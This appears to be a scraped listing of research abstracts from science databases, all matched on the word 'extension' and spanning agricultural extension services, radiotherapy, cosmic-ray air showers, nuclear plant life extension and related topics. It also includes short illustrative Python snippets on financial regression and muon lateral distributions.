After simple data preprocessing in the form of logarithmic differences, we augmented this single variate time series to a multivariate representation. This method makes use of sliding windows to calculate several dozen of new variables using simple statistic tools like first and second moments as well as more complicated statistic, like auto-regression coefficients and residual analysis, followed by an optional quadratic transformation that was further used for data extension. These were used as a explanatory variables in a regularized logistic LASSO regression which tried to estimate Buy-Sell Index (BSI) from real stock market data. 2. Radiology and Enterprise Medical Imaging Extensions (REMIX). Science.gov (United States) Erdal, Barbaros S; Prevedello, Luciano M; Qian, Songyue; Demirer, Mutlu; Little, Kevin; Ryu, John; O'Donnell, Thomas; White, Richard D 2018-02-01 Radiology and Enterprise Medical Imaging Extensions (REMIX) is a platform originally designed to both support the medical imaging-driven clinical and clinical research operational needs of Department of Radiology of The Ohio State University Wexner Medical Center. REMIX accommodates the storage and handling of "big imaging data," as needed for large multi-disciplinary cancer-focused programs. The evolving REMIX platform contains an array of integrated tools/software packages for the following: (1) server and storage management; (2) image reconstruction; (3) digital pathology; (4) de-identification; (5) business intelligence; (6) texture analysis; and (7) artificial intelligence. These capabilities, along with documentation and guidance, explaining how to interact with a commercial system (e.g., PACS, EHR, commercial database) that currently exists in clinical environments, are to be made freely available. 3. Production Flexibility in Extensive Beef Farming Systems Directory of Open Access Journals (Sweden) Laura Astigarraga 2011-03-01 Full Text Available The aim of this work is to assess the flexibility of production allowed by extensive production conditions faced with variations in the environment, i.e., market variations and climatic fluctuations, of Limousin beef systems. The study used a case-based methodology in which seven beef farms with less than 1 LU/ha were chosen. Data collection was based on three interviews using a semistructured questionnaire and on the analysis of productive and economic results over a 15-year period (1991-2005. The main evolution of these farms is related to a rise in work productivity associated with an increase in herd size. Herd increase was made possible by enlarging the area, the margin of intensification being limited in these regions. To take advantage of the enlarged land area, females were reared for fattening or for reproduction instead of selling them at weaning. The Limousin female provides a wide product mix because of its plasticity, as has been studied by several researchers. This mix flexibility is achieved by delaying product differentiation, a form of production flexibility that can reduce the risk of under-producing or over-producing varied product configurations. On the other hand, calves sold to the Italian market after weaning are generic products, associated with a flexible production process to overcome fluctuations in forage availability due to climatic variations. The introduction of maize silage for feeding acts as an alternative route, actual and potential, through the system to overcome unexpected forage shortage from natural grasslands as a result of droughts. 
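The pipeline outlined in item 1 above (log-return preprocessing, sliding-window "data extension", and a regularized logistic LASSO regression) might look roughly like the following sketch. The window length, the particular window statistics, the synthetic price series, and the up/down label standing in for the Buy-Sell Index are illustrative assumptions, not details taken from the paper.

```python
# Illustrative sketch for item 1 above: sliding-window extension of a univariate
# price series followed by L1-regularized ("LASSO") logistic regression.
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
price = 100 * np.exp(np.cumsum(rng.normal(0, 0.01, 2000)))  # synthetic prices
logret = np.diff(np.log(price))                             # logarithmic differences

W = 20  # sliding-window length (assumed, not from the paper)
X, y = [], []
for t in range(W, len(logret) - 1):
    win = logret[t - W:t]
    # simple window statistics as the "extended" multivariate representation
    feats = [win.mean(), win.std(), win.min(), win.max(),
             ((win[:-1] - win[:-1].mean()) * (win[1:] - win[1:].mean())).mean()]  # lag-1 autocovariance
    X.append(feats)
    y.append(int(logret[t + 1] > 0))   # crude up/down label standing in for a Buy-Sell Index

X, y = np.array(X), np.array(y)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, shuffle=False)
clf = LogisticRegression(penalty="l1", solver="liblinear", C=0.5).fit(X_tr, y_tr)
print("held-out accuracy:", clf.score(X_te, y_te))
```

The L1 penalty is what makes the extended feature set manageable: coefficients of uninformative window statistics are driven to zero, which is the role the LASSO plays in the abstract's setup.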
The study shows that extensive farming systems have developed types of flexibility to match different factors of uncertainty from the environment. Finally, the issue of farm system performance is thus not so much a question of whether a farm is fit at a specific moment in time, but whether it transforms into a less or more sustainable orientation. 4. Electron beam radiotherapy for the management of recurrent extensive ocular surface squamous neoplasia with orbital extension Directory of Open Access Journals (Sweden) Ramesh Murthy 2015-01-01 Full Text Available Recurrent extensive ocular surface squamous neoplasia (OSSN with orbital invasion can be successfully managed with external radiotherapy using electrons resulting in eye and vision salvage. We report a case of right eye recurrent OSSN in an immunocompetent adult Indian male, with extensive orbital involvement. The patient had two previous surgical excisions with recurrent disease. At this stage, conventionally exenteration is considered the treatment modality. However, he was treated with 5040 cGy radiotherapy (15eV electrons resulting in complete disease regression. At the end of 3 years follow-up, the patient was disease free, maintained a vision of 20/25, with mild dry eye, well-managed with topical lubricants. Extensive OSSN with orbital invasion does not always need exenteration. External beam electron radiotherapy provides a noninvasive cure with organ and vision salvage and should be considered in extensive OSSN not amenable to simple excision biopsies. Long-term studies to evaluate the effect of radiation on such eyes are suggested. 5. Electron beam radiotherapy for the management of recurrent extensive ocular surface squamous neoplasia with orbital extension. Science.gov (United States) Murthy, Ramesh; Gupta, Himika; Krishnatry, Rahul; Laskar, Siddhartha 2015-08-01 Recurrent extensive ocular surface squamous neoplasia (OSSN) with orbital invasion can be successfully managed with external radiotherapy using electrons resulting in eye and vision salvage. We report a case of right eye recurrent OSSN in an immunocompetent adult Indian male, with extensive orbital involvement. The patient had two previous surgical excisions with recurrent disease. At this stage, conventionally exenteration is considered the treatment modality. However, he was treated with 5040 cGy radiotherapy (15eV electrons) resulting in complete disease regression. At the end of 3 years follow-up, the patient was disease free, maintained a vision of 20/25, with mild dry eye, well-managed with topical lubricants. Extensive OSSN with orbital invasion does not always need exenteration. External beam electron radiotherapy provides a noninvasive cure with organ and vision salvage and should be considered in extensive OSSN not amenable to simple excision biopsies. Long-term studies to evaluate the effect of radiation on such eyes are suggested. 6. A Needs Assessment of Aquaculture Extension Agents, Specialists, and Program Administrators in Extension Programming Science.gov (United States) Schwarz, Michael H.; Gibson, Jerry 2010-01-01 The study reported here identified continuing education and training needs of aquaculture Extension agents, specialists, and program administrators in 10 competency areas relating to the need for continuing education or training. Fourteen resources on the AquaNIC Web site were also evaluated, as was the efficacy of the AQUA-EXT listserv. Data were… 7. 
Using Non-Extension Volunteering as an Experiential Learning Activity for Extension Professionals Science.gov (United States) Andrews, Kevin B.; Lockett, Landry L. 2013-01-01 Extension professionals can gain much-needed competencies in volunteer administration through experiential learning by participating in volunteer activities. Experiential learning is a means of behavior change that allows the individual learner to reflect on, abstract, and apply their experiences to new situations. This article expands on… 8. Lightweight Nozzle Extension for Liquid Rocket Engines Project Data.gov (United States) National Aeronautics and Space Administration — The ARES J-2X requires a large nozzle extension. Currently, a metallic nozzle extension is being considered with carbon-carbon composite as a backup. In Phase 1,... 9. The XML approach to implementing space link extension service management Science.gov (United States) Tai, W.; Welz, G. A.; Theis, G.; Yamada, T. 2001-01-01 A feasibility study has been conducted at JPL, ESOC, and ISAS to assess the possible applications of the eXtensible Mark-up Language (XML) capabilities to the implementation of the CCSDS Space Link Extension (SLE) Service Management function. 10. Hunger in Virginia : Extension's response ability : a resource guide OpenAIRE Taper, L. Janette 1987-01-01 Provides information to educate Extension professionals on the issue of hunger and malnutrition in Virginia. This guide will allow Extension professionals to conduct nutrition education programs in low income communities to help them improve their diets. 11. On non-extensive nature of thermal conductivity Abstract. In this paper we study the non-extensive nature of thermal conductivity. It is observed that there is a similarity between the non-extensive entropic index and the fractal dimension obtained for the silica aerogel thermal conductivity data at low temperature. 12. 76 FR 4350 - Health Information Technology Extension Program Science.gov (United States) 2011-01-25 ... DEPARTMENT OF HEALTH AND HUMAN SERVICES Health Information Technology Extension Program ACTION: Public Notice. SUMMARY: This notice announces changes to the Health Information Technology Extension... of the National Coordinator for Health Information Technology, 200 Independence Ave, SW., Suite 729D... 13. Extensible automated dispersive liquid–liquid microextraction Energy Technology Data Exchange (ETDEWEB) Li, Songqing; Hu, Lu; Chen, Ketao; Gao, Haixiang, E-mail: [email protected] 2015-05-04 Highlights: • An extensible automated dispersive liquid–liquid microextraction was developed. • A fully automatic SPE workstation with a modified operation program was used. • Ionic liquid-based in situ DLLME was used as model method. • SPE columns packed with nonwoven polypropylene fiber were used for phase separation. • The approach was applied to the determination of benzoylurea insecticides in water. - Abstract: In this study, a convenient and extensible automated ionic liquid-based in situ dispersive liquid–liquid microextraction (automated IL-based in situ DLLME) was developed. 1-Octyl-3-methylimidazolium bis[(trifluoromethane)sulfonyl]imide ([C₈MIM]NTf₂) is formed through the reaction between [C₈MIM]Cl and lithium bis[(trifluoromethane)sulfonyl]imide (LiNTf₂) to extract the analytes.
Using a fully automatic SPE workstation, special SPE columns packed with nonwoven polypropylene (NWPP) fiber, and a modified operation program, the procedures of the IL-based in situ DLLME, including the collection of a water sample, injection of an ion exchange solvent, phase separation of the emulsified solution, elution of the retained extraction phase, and collection of the eluent into vials, can be performed automatically. The developed approach, coupled with high-performance liquid chromatography–diode array detection (HPLC–DAD), was successfully applied to the detection and concentration determination of benzoylurea (BU) insecticides in water samples. Parameters affecting the extraction performance were investigated and optimized. Under the optimized conditions, the proposed method achieved extraction recoveries of 80% to 89% for water samples. The limits of detection (LODs) of the method were in the range of 0.16–0.45 ng mL⁻¹. The intra-column and inter-column relative standard deviations (RSDs) were <8.6%. Good linearity (r > 0.9986) was obtained over the calibration range from 2 to 500 ng mL⁻¹. The proposed ... 14. Cauchy-Kovalevskaya extension theorem in fractional Clifford analysis OpenAIRE Vieira, Nelson 2015-01-01 In this paper, we establish the fractional Cauchy-Kovalevskaya extension (FCK-extension) theorem for fractional monogenic functions defined on R^d. Based on this extension principle, fractional Fueter polynomials, forming a basis of the space of fractional spherical monogenics, i.e. fractional homogeneous polynomials, are introduced. We studied the connection between the FCK-extension of functions of the form x^\alpha P_l and the classical Gegenbauer polynomials. Finally we present two examp... 15. Lateral Distribution Functions of Extensive Air Showers Science.gov (United States) Geranios, A.; Fokitis, E.; Maltezos, S.; Koutsokosta, D.; Antoniadou, I.; Malandraki, O.; Mastichiadis, A.; Antonopoulou, E.; Gika, V.; Dimitrakoudis, S. The energy is among the characteristics of Ultra High Energy Cosmic Rays (E > 5 × 10¹⁹ eV) which could be estimated experimentally. The following paper attempts to estimate the energy of a UHECR proton by applying a Monte Carlo simulation code. A number of extensive air showers, vertical and inclined, is simulated to derive the Lateral Distribution Functions of the shower muons. The scenario of the simulations is adapted to the Cerenkov surface detector of the P. AUGER Observatory. Due to the fact that the Lateral Distribution Functions show minimal fluctuations of the muon density at a distance larger than 800 m from the core of the showers, and due to the fact that at a distance of 900 m the distribution functions for inclined showers coincide (which means that it does not change with the zenith angle of the showers), we select the muon density at 900 m to derive the energy of the primary protons. (The project is co-funded by the European Social Fund and National Resources (EPEAEK II) PYTHAGORAS II.) 16. Latest results of the Tunka Radio Extension Directory of Open Access Journals (Sweden) Kostunin D. 2017-01-01 The Tunka Radio Extension (Tunka-Rex) is an antenna array consisting of 63 antennas at the location of the TAIGA facility (Tunka Advanced Instrument for cosmic ray physics and Gamma Astronomy) in Eastern Siberia, near Lake Baikal. Tunka-Rex is triggered by the air-Cherenkov array Tunka-133 during clear and moonless winter nights and by the scintillator array Tunka-Grande during the remaining time.
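To make the energy-estimation idea in item 15 above concrete: a lateral distribution function gives the muon density as a function of core distance, and the value at 900 m is converted into a primary energy. The NKG-like functional form and the calibration constants below are placeholders chosen for illustration, not parameters from the paper.

```python
# Illustrative sketch for item 15 above: evaluate a muon lateral distribution
# function (LDF) and use the density at 900 m from the shower core as an
# energy estimator.  Functional form and constants are assumed, not quoted.
import numpy as np

def muon_ldf(r, n0, r0=320.0, alpha=0.75, eta=2.5):
    """Muon density [m^-2] at core distance r [m] for an NKG-like profile."""
    x = r / r0
    return n0 * x**(-alpha) * (1.0 + x)**(-(eta - alpha))

def energy_from_rho900(rho900, a=1.2e18, b=1.0):
    """Toy calibration: primary energy [eV] from the muon density at 900 m."""
    return a * rho900**b

r = np.linspace(100, 2000, 50)            # core distances sampled by an array
densities = muon_ldf(r, n0=5.0)           # one simulated shower profile
rho900 = muon_ldf(np.array([900.0]), n0=5.0)[0]
print(f"rho(900 m) = {rho900:.3f} m^-2 -> E ~ {energy_from_rho900(rho900):.2e} eV")
```

Choosing 900 m as the reference distance reflects the abstract's observation that shower-to-shower fluctuations of the LDF are smallest there and that inclined-shower profiles coincide at that radius.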
Tunka-Rex measures the radio emission from the same air-showers as Tunka-133 and Tunka-Grande, but with a higher threshold of about 100 PeV. During the first stages of its operation, Tunka-Rex has proven that sparse radio arrays can measure air-showers with an energy resolution of better than 15% and the depth of the shower maximum with a resolution of better than 40 g/cm². To improve and interpret our measurements as well as to study systematic uncertainties due to interaction models, we perform radio simulations with CORSIKA and CoREAS. In this overview we present the setup of Tunka-Rex, discuss the achieved results and the prospects of mass-composition studies with radio arrays. 17. Extensive Mandibular Ameloblastic Fibro-Odontoma. Science.gov (United States) Ribeiro, Cínthia Magalhães; Santos, Tatiana Tavares Marcelino Dos; de Castro, Sérgio Roberto; de Carli, Marina Lara; Sperandio, Felipe Fornias; Hanemann, João Adolfo Costa; Pereira, Alessandro Antônio Costa 2016-09-01 Ameloblastic fibro-odontoma (AFO) is a mixed odontogenic tumor that presents epithelial and mesenchymal components. Ameloblastic fibro-odontoma is generally diagnosed between the first and second decades of life and normally shows a slow clinical growth in the posterior portion of the maxilla or mandible, being mostly associated with 1 or more impacted teeth. Radiographic features of AFO show a well-defined, unilocular or multilocular radiolucent defect containing variable amounts of calcified material. Enucleation of the tumor is the usual treatment, and the patient should be followed up for a long period of time. Here, the authors report the case of a 17-year-old male patient who presented an extensive AFO on the right posterior side of the mandible. The panoramic radiograph and the tomographic examination revealed a multilocular radiolucent lesion with impacted teeth. Histological examination revealed connective tissue resembling the dental papilla along with epithelial strands or islands, as well as dental hard tissue such as enamel and dentin. Enucleation and curettage were performed and led to a good outcome. There was no recurrence after an 8-year follow-up, and oral rehabilitation was performed with dental implants. 18. Molecular regulation of plant cell wall extensibility Science.gov (United States) Cosgrove, D. J. 1998-01-01 Gravity responses in plants often involve spatial and temporal changes in cell growth, which is regulated primarily by controlling the ability of the cell wall to extend. The wall is thought to be a cellulose-hemicellulose network embedded in a hydrated matrix of complex polysaccharides and a small amount of structural protein. The wall extends by a form of polymer creep, which is mediated by expansins, a novel group of wall-loosening proteins. Expansins were discovered during a molecular dissection of the "acid growth" behavior of cell walls. Expansin alters the rheology of plant walls in profound ways, yet its molecular mechanism of action is still uncertain. It lacks detectable hydrolytic activity against the major components of the wall, but it is able to disrupt noncovalent adhesion between wall polysaccharides. The discovery of a second family of expansins (beta-expansins) sheds light on the biological role of a major group of pollen allergens and implies that expansins have evolved for diverse developmental functions. Finally, the contribution of other processes to wall extensibility is briefly summarized. 19. Greater trochanteric fracture with occult intertrochanteric extension.
Science.gov (United States) Reiter, Michael; O'Brien, Seth D; Bui-Mansfield, Liem T; Alderete, Joseph 2013-10-01 Proximal femoral fractures are frequently encountered in the emergency department (ED). Prompt diagnosis is paramount as delay will exacerbate the already poor outcomes associated with these injuries. In cases where radiography is negative but clinical suspicion remains high, magnetic resonance imaging (MRI) is the study of choice as it has the capability to depict fractures which are occult on other imaging modalities. Awareness of a particular subset of proximal femoral fractures, namely greater trochanteric fractures, is vital for both radiologists and clinicians since it has been well documented that they invariably have an intertrochanteric component which may require surgical management. The detection of intertrochanteric or cervical extension of greater trochanteric fractures has been described utilizing MRI but is underestimated with both computed tomography (CT) and bone scan. Therefore, if MRI is unavailable or contraindicated, the diagnosis of an isolated greater trochanteric fracture should be met with caution. The importance of avoiding this potential pitfall is demonstrated in the following case of an elderly woman with hip pain and CT demonstrating an isolated greater trochanteric fracture who subsequently returned to the ED with a displaced intertrochanteric fracture. 20. Supersymmetric extensions of Schrodinger-invariance International Nuclear Information System (INIS) Henkel, Malte; Unterberger, Jeremie 2006-01-01 The set of dynamic symmetries of the scalar free Schrodinger equation in d space dimensions gives a realization of the Schrodinger algebra that may be extended into a representation of the conformal algebra in d+2 dimensions, which yields the set of dynamic symmetries of the same equation where the mass is not viewed as a constant, but as an additional coordinate. An analogous construction also holds for the spin-1/2 Levy-Leblond equation. An N=2 supersymmetric extension of these equations leads, respectively, to a 'super-Schrodinger' model and to the (3|2)-supersymmetric model. Their dynamic supersymmetries form the Lie superalgebras osp(2|2) ⋉ sh(2|2) and osp(2|4), respectively. The Schrodinger algebra and its supersymmetric counterparts are found to be the largest finite-dimensional Lie subalgebras of a family of infinite-dimensional Lie superalgebras that are systematically constructed in a Poisson algebra setting, including the Schrodinger-Neveu-Schwarz algebra sns(N) with N supercharges. Covariant two-point functions of quasiprimary superfields are calculated for several subalgebras of osp(2|4). If one includes both N=2 supercharges and time-inversions, then the sum of the scaling dimensions is restricted to a finite set of possible values. 1. No imagination effect on boundary extension. Science.gov (United States) Munger, Margaret P; Multhaup, Kristi S 2016-01-01 Boundary extension (BE) occurs when people falsely remember perceiving beyond the edges of a presented scene. Theorists argue that BE occurs because people mistakenly attribute information they have generated to the study stimulus; that is, they make a source memory error. Inspired by this idea, in six experiments we tested whether scene details resulting from explicit imagination would be misremembered as actual visual perceptions, resulting in increased BE as compared with standard instructions.
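As background to item 20 above, the "scalar free Schrodinger equation" and the step of treating the mass as an additional coordinate can be written schematically as follows; the sign and normalization conventions are illustrative and may differ from those used by the authors.

```latex
% Free Schroedinger equation in d space dimensions (units with hbar = 1);
% its maximal kinematic symmetry is the Schroedinger algebra referred to above.
\[
  \big( 2\mathrm{i} m\,\partial_t + \nabla_{\mathbf r}^{\,2} \big)\,\psi(t,\mathbf r) \;=\; 0 .
\]
% Promoting the mass to a coordinate: a formal Fourier transform with respect
% to m introduces a dual variable zeta, giving a field on d+2 coordinates
% (zeta, t, r), on which the symmetry extends to a conformal algebra.
\[
  \psi(t,\mathbf r) \;=\; \int_{\mathbb R} \mathrm d\zeta \;
  e^{\,\mathrm{i} m \zeta}\, \tilde\psi(\zeta, t, \mathbf r).
\]
```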
In four experiments, undergraduates completed a BE task with separate study and test blocks; in two further experiments, undergraduates completed a trial-by-trial BE task (N = 290). Half of the participants elaborated on the study pictures (imagined smells and sounds, or what was to the left and right of the scene, or what a photographer would see by zooming in or out). Robust BE was found in all experiments, but none of the elaborations modified the size of BE; therefore, BE is not to be affected by explicit elaboration and may be related to spatial rather than visual imagery ability. 2. Computers make rig life extension an option Energy Technology Data Exchange (ETDEWEB) NONE 1996-10-01 The worldwide semisubmersible drilling rig fleet is approaching retirement. But replacement is not an attractive option even though dayrates are reaching record highs. In 1991, Schlumberger Sedco Forex managers decided that an alternative might exist if regulators and insurers could be convinced to extend rig life expectancy through restoration. Sedco Forex chose their No. 704 semisubmersible, an 18-year North Sea veteran, to test their process. The first step was to determine what required restoration, meaning fatigue life analysis of each weld on the huge vessel. If inspected, the task would be unacceptably time-consuming and of questionable accuracy. Instead a suite of computer programs modeled the stress seen by each weld, statistically estimated the sea states seen by the rig throughout its North Sea service and calibrated a beam-element model on which to run their computer simulations. The elastic stiffness of the structure and detailed stress analysis of each weld was performed with ANSYS, a commercially available finite-element analysis program. The use of computer codes to evaluate service life extension is described. 3. Legislated Policy as the Basis for Effective Extension Delivery ... African Journals Online (AJOL) The paper compares the extension policies and programmes of Britain and Nigeria. Extension policy in Nigeria is characterized as stemming from ad hoc arrangements which are compounded by political instability and external locus of control. The United Kingdom in contrast has had focused extension policies supported ... 4. Strategic Directions for Extension Health and Wellness Programs Science.gov (United States) Rodgers, Michelle; Braun, Bonnie 2015-01-01 The new Cooperative Extension National Framework for Health and Wellness is a tool to help Extension systematically address the programmatic area of health and wellness at the individual, community, environmental, and policy levels. Key strategies of the framework tool are provided and suggestions for ways that Extension can use this framework… 5. Evaluation of performance of extension workers in Lesotho | Mokone ... African Journals Online (AJOL) The extension service in Lesotho and other developing countries have been criticized for not being able to bring the necessary change in the farming populace, especially the rural and resource poor. Extension workers are faced with problems that need to be dealt with in order for them and extension as a whole to be ... 6. Evaluating retail format extensions : The role of shopping goals NARCIS (Netherlands) Haans, A.J. 2011-01-01 Although retail extensions have become a common growth strategy, more than 50% fail to survive. The question what drives extension success, therefore remains a key issue. 
This research tests the hypothesis that expectations about the attributes of extensions, and as a result of their evaluations, 7. Agriflection: A Learning Model for Agricultural Extension in South Africa Science.gov (United States) Worth, S. H. 2006-01-01 Prosperity--continuous and sustainable wealth creation--is an elusive goal in South African smallholder agriculture. This paper suggests that agricultural extension can facilitate realising this objective if an appropriate approach to extension can be developed. To develop such an approach requires that the definition of extension and the… 8. Prospectus for a Cooperative Extension System in Education. Science.gov (United States) Rogers, Everett M. 1992-01-01 This article reviews lessons learned from the agricultural extension model that may apply to the proposed cooperative extension service in education. The agricultural extension model is a user-oriented system linking knowledge producers with other knowledge users. In education, the adopters of innovations may be organizations as well as… 9. Evaluation of Effects of Maize Extension Package on Farmers ... African Journals Online (AJOL) The study examined the effects of maize extension package on farmers indigenous practices in Nwangele Local Government Area (LGA) of Imo State, Nigeria. Both farmers and extension agents were the target audience. Fifty (50) farmers and two (2) extension agents were purposively sampled from the selected ... 10. Exploring Extension Involvement in Farm to School Program Activities Science.gov (United States) Benson, Matthew C. 2014-01-01 The study reported here examined Extension professionals' involvement in farm-to-school program activities. Results of an online survey distributed to eight state Extension systems indicate that on average, Extension professionals are involved with one farm to school program activity, with most supporting school or community garden programs.… 11. Constraints to agricultural extension work in Ethiopia: the insiders ... African Journals Online (AJOL) This paper examines principal obstacles to agricultural extension work in Ethiopia. The historical review reveals that extension programs and policies have been formulated without due consideration to the farmers' opinion, the various extension approaches have been biased against the livestock sub-sector, and research ... 12. Public extension agents' need for new competencies: evidence from ... African Journals Online (AJOL) Small yield differences between Extension service-recipients and non-recipients indicate that Extension support has minimal effect on farmers' production. Agents need new competencies regarding correct application conservation agriculture. The study recommends the involvement of extension agents, scientists and ... 13. sources and use of extension information among maize farmers African Journals Online (AJOL) Sources of extension information available to farmers are diverse and numerous. Generally, extension information is sourced through extension worker, the mass media (i.e. radio and television in particular), printed publications (e.g. newspapers, magazines, bulletins, newsletters, fliers, journals, handbills) and other human ... 14. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI http://dx.doi.org/10.4314/jae.v17i2.14. Local Government Funding of Extension Services in Anambra ... all the local government staff of the. Agriculture and Veterinary Department in the 21 LGAs of Anambra State. ... 
extension, animal health, extension services and veterinary clinics; (iii) control and acquisition of land (mainly ... 15. Expanding the Reach of Extension through Social Media Science.gov (United States) Gharis, Lauri W.; Bardon, Robert E.; Evans, Jennifer L.; Hubbard, William G.; Taylor, Eric 2014-01-01 With increasing numbers of the public using social media applications, Extension professionals have the ability to apply these same tools to connect with their clients. This article demonstrates how a social media toolset can be employed by Extension professionals by identifying how Extension professionals are currently using social media,… 16. Hybrid Teaching in Extension: Learning at the Crossroads Science.gov (United States) Hino, Jeff; Kahn, Cub 2016-01-01 Extension clients' learning preferences are changing, with many increasingly going online for educational content. In response, Oregon State University Extension pilot tested a training program for Extension educators to explore hybrid teaching--a methodology that could provide more flexible access to a wider audience. Hybrid teaching offers a… 17. Using Authentic Materials for Extensive Reading to Promote English Proficiency Science.gov (United States) Guo, Siao-cing 2012-01-01 Current literature points to the importance and benefits of extensive reading. Extensive reading provides contextualized clues for better reading comprehension (Krashen, 1982), and substantial linguistic input (Bell, 1998) needed for language development. Several studies have found a correlation between extensive reading and specific linguistic… 18. Perspective of agricultural extension in livestock production in ... African Journals Online (AJOL) The extension communication methods used were visits, demonstration, workshop, training and excursion. The benefits of extension services were introduction of livestock species, marketing information, feed and feed ingredient supply, disease and pest control, and liaison services. Constraints to the use of extension ... 19. The Nature of Organizational Learning in a State Extension Organization Science.gov (United States) Leuci, Mary Simon 2012-01-01 Our complex and rapidly changing world demands a more nimble, responsive, and flexible Extension organization. The findings from a study involving interviews across a state Cooperative Extension Service paint a picture of organizational learning in Extension. Four key dimensions of learning surfaced. Of particular importance are the application of… 20. Facilitating protein solubility by use of peptide extensions Science.gov (United States) Freimuth, Paul I; Zhang, Yian-Biao; Howitt, Jason 2013-09-17 Expression vectors for expression of a protein or polypeptide of interest as a fusion product composed of the protein or polypeptide of interest fused at one terminus to a solubility enhancing peptide extension are provided. Sequences encoding the peptide extensions are provided. The invention further comprises antibodies which bind specifically to one or more of the solubility enhancing peptide extensions. 1. Division File of Extension Research Materials; Additions During 1968. Science.gov (United States) Byrn, Darcie, Comp. In this annotated bibliography of acquisitions during 1968 appear 265 Extension studies on administrative organization and management; training and staff development; mobilizing participation in Extension work; local leadership; program content and planning procedures; general effectiveness and progress in Extension; teaching methods, techniques,… 2. 
1964 Statistics on Activities of Cooperative Extension Service. Science.gov (United States) Department of Agriculture, Washington, DC. The educational activities of approximately 11,000 county and 3,100 state cooperative extension staff members are presented in this statistical report for 1964. Included are data on the number of extension agents employed; extension methods (individual personal contact, news stories, radio and television broadcasts, publications, circular letters,… 3. Farmers and Extension Personnel View of Constraints to Effective ... African Journals Online (AJOL) About 54% of farmers perceived that extension service is ineffective while about 46% of extension personnel perceived it to be effective. Results show a weak correlation between personal characteristics of farmers and their perception towards the effectiveness of agricultural extension services (r = 0.081, p < 0.05). 4. Job burnout and coping strategies among extension agents in south ... African Journals Online (AJOL) The need to maintain a non-mineral dependent economy and daunting food import bills have been the drive for the provision of extension services, which is dependent on a motivated extension workforce. Extension personnel will not stay motivated under circumstances where the risk of job burnout is high. A simple random ... 5. Determinants of training needs of extension personnel of agricultural ... African Journals Online (AJOL) The dynamics experienced in agricultural practice have put extension service delivery on a new platform that requires regular updating of extension staff knowledge with new competences, to meet the changing needs of the clientele they serve. This study therefore sought to determine the training needs of extension ... 6. Stress coping strategies among agricultural extension agents in Oyo ... African Journals Online (AJOL) The study examined the coping strategies used by extension agents. A total of seventy-two (72) agricultural extension agents were randomly sampled out of 288 agricultural extension agents from the four zones (Saki, Oyo, Ogbomosho, and Ibadan) in the Oyo State Agricultural Development Programme (OYSADEP). 7. Gender Differences In Agriculture Extension Services And Training ... African Journals Online (AJOL) Findings show that despite the women's important role in agricultural production, disparities exist in the delivery of extension services and training programmes in the province. The need to train, deploy and target women and men in extension services is emphasized. Keywords: gender differences, agricultural extension ... 8. The human resource conditions of lifetime extension International Nuclear Information System (INIS) Aszodi, A. 2002-01-01 Full text: According to our present knowledge, the lifetime extension of the Hungarian NPP units will be feasible, in both the technological and economic aspects. It is far more difficult, however, to answer the question whether the human resource conditions for the further application of nuclear energetics in Hungary can be satisfied. Many urgent tasks will have to be solved regarding informing the public and nuclear engineering education. The training of nuclear experts is in crisis in many developed industrial countries. The university departments work with a staff mainly consisting of old and quite often near-retirement trainers, and the young generation is practically missing.
A particularly grave problem is (see Germany) that in a number of countries hardly any student chooses nuclear technology/engineering. Moreover, several nuclear training and research facilities have been shut down. Although the situation in Hungary is not so critical at present, the rising of the new generation of professionals may easily get into a crisis without immediate intervention. The training reactor of BUTE celebrated its 30th anniversary in 2001 and the technical conditions allow some further 20 or 25 years of operation. On the other hand, however, the age distribution of the operating staff can not be sustained even on a few-year term: the average age is 55 years, while 44% of them are retired! Although, due to financing difficulties the rejuvenation of the operating personnel has not been possible for years, it is definitely vital to maintain and develop the reactor and the ongoing educational work. By analysing the age distribution of the workers of the Hungarian energetics one can conclude: 350 to 400 young engineers will have to start work up till 2020 (i.e. 15 to 20 per year), while only 2 to 8 students graduate from the Hungarian universities who acquire some level of nuclear knowledge during their studies. In a co-operation between BUTE and the Paks NPP we are 9. NRU licence extension via integrated safety review Energy Technology Data Exchange (ETDEWEB) 2014-07-01 The National Research Reactor, NRU at AECL Chalk River Laboratories achieved first criticality in November 1957. The completion of an Integrated Safety Review (ISR) in 2011, and subsequent Global Assessment Report (GAR), and Integrated Implementation Plan (IIP) has given confidence in the safe and reliable operation of NRU, therefore extending the licensing case to safely and reliably operate NRU until 2021 and beyond (64+ years of operation). The key vehicle to achieve this confidence is the IIP, that resulted from the ISR. NRU's IIP is a 10 year plan that addresses the gaps identified in the ISR between modern codes and standards in a prioritized approach. AECL is currently in year 3 of the IIP execution, is on or ahead of schedule to complete the identified improvements. The IIP in conjunction with a License Condition Handbook has replaced the licensing protocol with the Canadian Nuclear Safety Commission, (CNSC). Execution of the IIP to plan supports the continued safe operation of NRU. The ISR was carried out with the recognition that the NRU reactor is a research and isotope producing reactor approaching license renewal and not a power reactor undergoing refurbishment and life extension. Therefore, the IIP is being executed while NRU continues to deliver on its three missions: production of medical isotopes, support for fuels and materials research, and serving as a high flux neutron source in support of research relying on neutron scattering. The IIP is grouped into 5 Global Issue Groups, (GIGs) to support focused execution. The activities and tasks within the five GIGs are being executed via a matrix organization through the use of the Chalk River Laboratories Corrective Action Program to ensure the assignment of actions, completion and evidence to support closure is documented and retained. This paper discusses the approach taken by AECL to license and ensure safe, reliable operation of NRU until 2021 and beyond. (author) 10. 75 FR 80425 - Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and... Science.gov (United States) 2010-12-22 ... 
